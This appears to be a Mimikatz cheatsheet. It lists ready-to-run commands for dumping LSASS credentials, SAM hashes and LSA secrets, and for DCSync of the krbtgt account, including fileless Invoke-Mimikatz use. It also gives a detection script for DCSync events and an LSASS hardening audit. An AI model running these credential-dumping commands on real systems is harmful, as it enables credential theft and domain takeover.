Mimikatz Cheatsheet

1. Basic Commands

Mimikatz commands are straightforward. Here are the essential ones:

| Command | Purpose |
| :--- | :--- |
| mimikatz.exe | Launch the tool (interactive mode). |
| mimikatz # privilege::debug | Enables SeDebugPrivilege for the Mimikatz process. This is the "master key" to interact with LSASS; it only works if the current account already holds the privilege, which local Administrators do by default. |
| mimikatz # token::elevate | Elevates to the SYSTEM account by impersonating its token (often needed for LSASS access). |
| mimikatz # exit | Exit the Mimikatz console. |

The same commands can be chained on the command line; put exit last so the binary returns instead of dropping into the console:

```
mimikatz.exe "privilege::debug" "token::elevate" "exit"
```

```powershell
# Using Invoke-Mimikatz (from PowerSploit): loads Mimikatz reflectively, so no binary touches disk
powershell -exec bypass
Import-Module .\Invoke-Mimikatz.ps1
# sekurlsa::logonpasswords dumps the credentials of every logged-on session from LSASS memory
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
```
2. Credential Dumping

| Command | Purpose |
| :--- | :--- |
| lsadump::sam | Dumps local SAM hashes (NTLM) from the registry. |
| lsadump::sam /sam:FILE /system:FILE | Dump SAM from saved hive files (offline); the SYSTEM hive supplies the boot key needed to decrypt the SAM hive. |
| lsadump::secrets | Dumps LSA secrets from the SECURITY registry hive (e.g., service account and auto-logon passwords). Cached domain logons are a separate store, read with lsadump::cache. |

| Command | Purpose |
| :--- | :--- |
| mimikatz # lsadump::dcsync /user:krbtgt | Mimics a Domain Controller to pull account hashes from Active Directory without touching the NTDS.dit file directly. It requires the replication rights on the domain object (Domain Admins, Enterprise Admins and DC computer accounts hold them by default), so the account it runs as matters more than the host it runs on. |
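DCSync is visible on the domain controller as Security event 4662: a request for the replication extended rights on the domain object. The PowerShell below is an added example, not code from the page or from the Mimikatz project, that flags such requests when they come from anything other than a machine account. The event records are constructed for the demo, the function name Find-DCSyncCandidate and its -AllowList parameter are this example's own, and live use assumes "Audit Directory Service Access" is enabled on the DCs, otherwise 4662 is never written.

```powershell
# Added example (not from the page or the Mimikatz project): flag DCSync-style replication
# requests in Security event 4662 records. Live use assumes 'Audit Directory Service Access'
# is enabled on the domain controllers; the sample events below are constructed, not captured.

# Extended rights that AD replication needs; DCSync asks the DC for exactly these.
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)

function Find-DCSyncCandidate {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [object] $Record,
        # Non-DC accounts that legitimately replicate (e.g. an Azure AD Connect service
        # account). Hypothetical, environment-specific allow list.
        [string[]] $AllowList = @()
    )
    process {
        if ($Record.Id -ne 4662) { return }
        if ($Record.AccessMask -ne '0x100') { return }            # 0x100 = Control Access (extended right)
        $hits = $ReplicationGuids | Where-Object { $Record.Properties -match [regex]::Escape($_) }
        if (-not $hits) { return }
        if ($Record.SubjectUserName.EndsWith('$')) { return }     # machine account: normally another DC
        if ($AllowList -contains $Record.SubjectUserName) { return }
        [pscustomobject]@{
            Time    = $Record.TimeCreated
            Account = "$($Record.SubjectDomainName)\$($Record.SubjectUserName)"
            Rights  = ($hits -join ', ')
        }
    }
}

# Constructed sample records, in the shape Get-WinEvent's EventData has after XML parsing.
$SampleEvents = @(
    [pscustomobject]@{ Id = 4662; TimeCreated = '2024-05-01 09:00:01'; SubjectDomainName = 'CORP'; SubjectUserName = 'DC02$'; AccessMask = '0x100'
                       Properties = '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' }   # DC-to-DC replication, benign
    [pscustomobject]@{ Id = 4662; TimeCreated = '2024-05-01 09:14:37'; SubjectDomainName = 'CORP'; SubjectUserName = 'jdoe'; AccessMask = '0x100'
                       Properties = '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' }   # user account replicating
    [pscustomobject]@{ Id = 4662; TimeCreated = '2024-05-01 09:20:00'; SubjectDomainName = 'CORP'; SubjectUserName = 'jdoe'; AccessMask = '0x100'
                       Properties = '{00299570-246d-11d0-a768-00aa006e0529}' }                                        # a different extended right (password reset)
    [pscustomobject]@{ Id = 4624; TimeCreated = '2024-05-01 09:21:10'; SubjectDomainName = 'CORP'; SubjectUserName = 'jdoe'; AccessMask = $null
                       Properties = $null }                                                                            # unrelated logon event
)

$SampleEvents | Find-DCSyncCandidate | Format-Table -AutoSize

# Live use on a DC (not run here): project the XML EventData onto the same property names.
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662 } | ForEach-Object {
#     $d = @{}; ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
#     [pscustomobject]@{ Id = $_.Id; TimeCreated = $_.TimeCreated; SubjectDomainName = $d.SubjectDomainName
#                        SubjectUserName = $d.SubjectUserName; AccessMask = $d.AccessMask; Properties = $d.Properties }
# } | Find-DCSyncCandidate
```

The filter keys on the access mask and the right GUIDs rather than on process names, because DCSync never runs on the DC itself; the only artifact the DC sees is the replication request. Excluding accounts that end in "$" removes DC-to-DC replication noise, and the allow list is where a site's legitimate non-DC replicators go.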
3. Lateral Movement

token::elevate impersonates a token that is already present on the host: the SYSTEM token by default, or a domain admin's token with token::elevate /domainadmin. This can be used to shift between different administrative tokens to test least-privilege configurations. Any token Mimikatz can borrow this way is a credential the host was holding for a logged-on account, which is exactly the exposure the tiering rule below is meant to remove.

| Command | Purpose |
| :--- | :--- |
| mimikatz # token::elevate | Impersonates the SYSTEM token (run privilege::debug first). |

4. Defensive Best Practices

| Defense | Why it Works |
| :--- | :--- |
| Enable Credential Guard (Windows 10/11 + Server 2016+) | Moves LSA secrets into an isolated process (LSAIso) protected by virtualization-based security. Mimikatz cannot read its memory, even as SYSTEM. |
| Enable "Run as Protected Process" (LSA Protection, RunAsPPL) | Makes LSASS a protected process, so even a process holding SeDebugPrivilege (privilege::debug) cannot open it. Bypasses exist (e.g., loading a driver to strip the protection), but they need kernel-level access and are noisy. |
| Disable WDigest (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, UseLogonCredential = 0) | Prevents storage of plaintext passwords in memory. Off by default since Windows 8.1/Server 2012 R2; set the value explicitly and alert when it is changed to 1, since that is what attackers do to re-enable it. |
| Deploy EDR with LSASS Monitoring | EDR hooks OpenProcess and ReadProcessMemory calls on LSASS (Sysmon Event ID 10 records the same handle requests). |
| Restrict Admin Logons (Tiering) | Prevent domain admin sessions on low-value workstations, so there is nothing high-value in LSASS to dump or impersonate. |
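To check the registry-backed settings from the table on a host, here is an added PowerShell audit (example code, not from the page): it compares RunAsPPL, UseLogonCredential and LsaCfgFlags with their expected values, optionally sets the two that are plain switches, and reads Credential Guard's runtime state from the Win32_DeviceGuard class. The function names Test-LsassHardening and Get-CredentialGuardStatus and the -Fix switch are this example's own. It assumes an elevated session; a RunAsPPL change takes effect only after a reboot, and Credential Guard additionally needs VBS enabled, which the script reports on but does not configure.

```powershell
# Added example (not from the page): audit the registry-backed defenses from the table
# on the local host and, with -Fix, set the two that are plain registry switches.
# Assumes an elevated session. Credential Guard also needs VBS, which this only reports on.

$Checks = @(
    @{ Name = 'LSA Protection (RunAsPPL)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'; Value = 'RunAsPPL'
       Pass = { param($v) $v -in 1, 2 }; Fix = 1 }       # 1 = on (UEFI-locked on new builds), 2 = on without UEFI lock
    @{ Name = 'WDigest plaintext caching off'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'; Value = 'UseLogonCredential'
       Pass = { param($v) $v -eq 0 }; Fix = 0 }          # absent means off on 8.1/2012 R2+; pin it so a flip to 1 is visible
    @{ Name = 'Credential Guard configured (LsaCfgFlags)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'; Value = 'LsaCfgFlags'
       Pass = { param($v) $v -in 1, 2 }; Fix = $null }   # 1 = on with UEFI lock, 2 = on without; needs VBS, so not set here
)

function Test-LsassHardening {
    param([switch] $Fix)
    foreach ($c in $Checks) {
        $current = (Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
        $ok = & $c.Pass $current
        if (-not $ok -and $Fix -and $null -ne $c.Fix) {
            if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
            Set-ItemProperty -Path $c.Path -Name $c.Value -Value $c.Fix -Type DWord
            $current = $c.Fix; $ok = $true                  # RunAsPPL only applies after the next reboot
        }
        [pscustomobject]@{
            Check   = $c.Name
            Current = $current
            Status  = $(if ($ok) { 'PASS' } else { 'FAIL' })
        }
    }
}

function Get-CredentialGuardStatus {
    # Runtime truth, independent of the registry: 1 in SecurityServicesRunning means
    # Credential Guard is actually up; VirtualizationBasedSecurityStatus 2 means VBS is running.
    $dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    [pscustomobject]@{
        VbsRunning            = ($dg.VirtualizationBasedSecurityStatus -eq 2)
        CredentialGuardActive = ($dg.SecurityServicesRunning -contains 1)
    }
}

Test-LsassHardening | Format-Table -AutoSize    # add -Fix to set RunAsPPL and UseLogonCredential
Get-CredentialGuardStatus
```

The WDigest check deliberately fails when the value is absent: the default is already off on current Windows, but an explicit 0 is what lets you alert on the value changing, which is the tell for an attacker re-enabling plaintext caching before the next logon.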